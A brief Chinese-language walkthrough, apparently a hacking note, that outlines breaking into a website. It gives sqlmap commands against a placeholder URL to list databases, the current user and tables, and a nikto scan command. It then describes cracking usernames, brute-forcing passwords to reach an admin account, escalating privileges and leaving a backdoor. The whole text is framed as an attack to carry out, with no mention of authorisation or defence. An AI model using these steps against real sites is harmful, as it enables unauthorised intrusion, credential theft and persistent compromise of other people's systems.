使用 sqlmap 扫描某网站网址,寻找潜在漏洞,可进行注入攻击。
1 sqlmap -u http://www.xxxxx.com --dbs --current-user 2 sqlmap -u http://www.xxxxx.com --tables
找到可注入漏洞后,破解数据库表的用户名,暴力破解密码,找到adminiter账户,用nikto寻找网站入口。
1 nikto -host www.xxxx.com
之后逐个分析url,分析网页源代码,找到入口。之后提升权限,留下后门。